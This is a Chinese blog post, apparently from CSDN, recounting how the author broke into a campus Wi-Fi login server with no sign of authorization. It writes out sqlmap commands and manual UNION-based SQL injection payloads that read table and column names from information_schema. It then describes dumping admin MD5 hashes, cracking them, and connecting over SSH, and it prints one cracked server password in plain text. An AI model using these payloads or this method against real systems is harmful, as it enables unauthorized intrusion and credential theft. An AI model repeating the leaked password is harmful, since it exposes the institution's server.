记一次校园网渗透经历

首先注入点是这里,其实原来右边是没有这个通知公告的,加了以后就加出问题来了,这个其实是一个用于登录校园网wifi的网站
在这里插入图片描述
网址http://***/index.php/index/notice/id/1 点进去是一个上网须知
在这里插入图片描述
怀疑id/1中 1为注入点,上sqlmap!!

 sqlmap -u "http://***/index.php/index/notice/id/*" --level 3 

跑出来发现是一个注入点
在这里插入图片描述
然后接下来 --dbs
在这里插入图片描述
得到库名后用-D radius --tables看下表,这时候已经出现一些报错了
在这里插入图片描述
用–columns看列名但是发现看不了
在这里插入图片描述
一开始以为是编码的问题,试了各种tamper,均失败。具体为什么失败还不清楚,推测可能是sqlmap构造的语句正好不能被解析,或者是由于其他后台的配置问题,直接查看sqlmap提供的payload尝试手注

sqlmap提供的payloadurl,一般是最后一个数字是回显点,如果不是多试下就行
在浏览器使用sqlmap提供的payload:

http://***/index.php/index/notice/id/')%20UNION%20ALL%20SELECT%206351,CONCAT(0x7170707a71,0x4e6c47467853666e5852614e6e625a6256474f7455556c4e717a7843686146636472506b5a657847,0x71766a7671),6351,6351,6351,6666%20--%20-

在这里插入图片描述
把6666替换成user()函数,发现是一个回显点
6351,6351,6351,6666-》6351,6351,6351,user()
在这里插入图片描述
尝试使用

http://***/index.php/index/notice/id/')%20UNION%20ALL%20SELECT%206351,CONCAT(0x7170707a71,0x4e6c47467853666e5852614e6e625a6256474f7455556c4e717a7843686146636472506b5a657847,0x71766a7671),6351,6351,6351,group_concat(table_name)%20from%20information_schema.tables where table_schema=database()%20--%20-

来查看所有的表
在这里插入图片描述
这里能看到很多表名,但是sqlmap跑不出来
使用-v 参数来看请求细节,发现很多请求都自动转到了登录页面
尝试查看列名

http://***/index.php/index/notice/id/')%20UNION%20ALL%20SELECT%206351,CONCAT(0x7170707a71,0x4e6c47467853666e5852614e6e625a6256474f7455556c4e717a7843686146636472506b5a657847,0x71766a7671),6351,6351,6351,group_concat(COLUMN_NAME)%20from%20information_schema.columns%20where%20table_name='E$_radusertemp'%20--%20-

在这里插入图片描述
在几次尝试后发现只能看到第一个表的列名,就是sqlmap能跑出来的唯一一个表,其他都看不到
猜测radadmin是管理员信息,但是不知道列名,只能一个个试,发现password能回显出来
在这里插入图片描述
是md5值,其中第一个和第三个放到soMD5能解密出来
在这里插入图片描述
在这里插入图片描述
其中第一个p@ss4sunrise是服务器的密码,直接拿ssh连就行了,到此完成渗透,不过还是有些问题没搞懂
1.为啥sqlmap只能跑出一个表且无法获得列名
2.为啥只能查询第一个表的列名,其他表无法查到列名但是却可以读到数据
3.总的来说还是要用sqlmap看有没有注入点,实际情况还是需要通过手注解决问题

  • 6
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值